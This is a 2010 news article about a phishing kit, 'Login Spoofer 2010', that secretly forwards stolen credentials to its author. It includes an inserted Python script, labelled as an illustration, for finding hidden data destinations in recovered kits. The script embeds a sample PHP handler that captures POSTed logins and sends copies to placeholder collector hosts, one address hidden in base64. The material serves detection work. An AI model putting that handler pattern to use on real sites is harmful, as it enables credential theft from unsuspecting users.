Employs a cloud-like distributed infrastructure

Jul 27, 2010 10:54 GMT  ·  By

Security researchers from data protection solutions vendor Imperva have uncovered a new phishing kit that secretly sends the data stolen by the phishers who use it back to its creator. The tool can generate phishing pages for many popular online services and relies on a distributed infrastructure.

Called “Login Spoofer 2010”, the program was apparently created by a hacker calling himself hol4ko, who advertises it on hacking forums and newsgroups. According to Imperva, the malware writer boasts over 200,000 downloads for his phishing kit, which, if true, makes it quite successful.

Even though the kit's interface is in English, it appears to have been coded in Algeria, possibly pointing to the nationality of its author. It also comes with instructions in Arabic and can create fake websites mimicking the login pages of multiple services such as PayPal, Hotmail, Gmail, Yahoo!, MSN, Facebook, MySpace, Skype, CamFrog, Skyrock, Maktoob, Gamezer, Travian, RapidShare, 4Shared and MegaUpload.

There is also an option to choose between PHP and HTML for the generated phishing page's extension, and to encrypt the file containing the stolen credentials. A dashboard view allows phishers to browse the captured data, ordered in blocks of fields showing username, password, type of account and IP address.

“[…] This attack highlights that there’s no honor among thieves. […] The irony is that anyone using this kit becomes an unknowing member of the master hacker’s army. When hackers use this kit and deploy a successful phishing campaign, all the stolen credentials and information go straight back to the master hacker without the proxy hacker’s knowledge. It’s very clever. The master hacker never needs to conduct a campaign to see financial gain,” the Imperva security researchers explain.

It is also noted that while most traditional phishing schemes store the fake pages and the collected data on the same server, this kit takes what Imperva calls a “new cloud-based approach” to infrastructure. Because the back-end is hosted separately, the phishers only need to move their front-end phishing pages if the servers hosting them are taken down.
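As an added illustration (not code from the article, from Imperva, or from the kit itself), the following Python triage script shows how an incident responder who has recovered a phishing kit's credential handler can list every destination the captured data is sent to, so that a second, undeclared recipient of the kind described above stands out. The kit source and every host and address in it are constructed placeholders.

```python
import base64
import re

EMAIL_RE = re.compile(r"[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}")
URL_RE = re.compile(r"https?://[^\s\"'()]+")
# quoted base64-looking literals; kits often hide a second address this way
B64_RE = re.compile(r"[\"']([A-Za-z0-9+/]{16,}={0,2})[\"']")

# Constructed sample handler (placeholder hosts, not the real kit's code).
# The operator configured one recipient; a second collector is hidden below.
HIDDEN_B64 = base64.b64encode(b"owner@kit-author.example").decode()
SAMPLE_KIT_SOURCE = rf'''<?php
$to = "operator@phisher.example"; // address the kit's user configured
$log = fopen("creds.txt", "a");
fwrite($log, $_POST["user"] . ":" . $_POST["pass"] . "\n");
mail($to, "New login", print_r($_POST, true));
// hidden: copies every capture to the kit author's own collector
@file_get_contents("http://collector.kit-author.example/up.php?d=" . base64_encode(serialize($_POST)));
@mail(base64_decode("{HIDDEN_B64}"), "copy", print_r($_POST, true));
?>'''


def decode_b64_literals(source):
    """Decode quoted base64 literals that turn out to be printable ASCII."""
    found = []
    for m in B64_RE.finditer(source):
        try:
            found.append(base64.b64decode(m.group(1), validate=True).decode("ascii"))
        except (ValueError, UnicodeDecodeError):
            continue  # not valid base64 or not text: ignore
    return found


def extract_destinations(source):
    """Every e-mail address and URL in the handler, including base64-hidden ones."""
    dests = set()
    for text in [source] + decode_b64_literals(source):
        dests.update(EMAIL_RE.findall(text))
        dests.update(u.rstrip("/") for u in URL_RE.findall(text))
    return dests


def hidden_destinations(source, operator_configured):
    """Destinations the kit's operator did not configure, i.e. the backdoor."""
    return sorted(extract_destinations(source) - set(operator_configured))


if __name__ == "__main__":
    for d in hidden_destinations(SAMPLE_KIT_SOURCE, ["operator@phisher.example"]):
        print("undeclared destination:", d)
```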

You can follow the editor on Twitter @lconstantin

[Photo gallery, 2 images: “Phishing kit steals from the hackers who use it”; “Login Spoofer 2010 phishing kit screenshot”]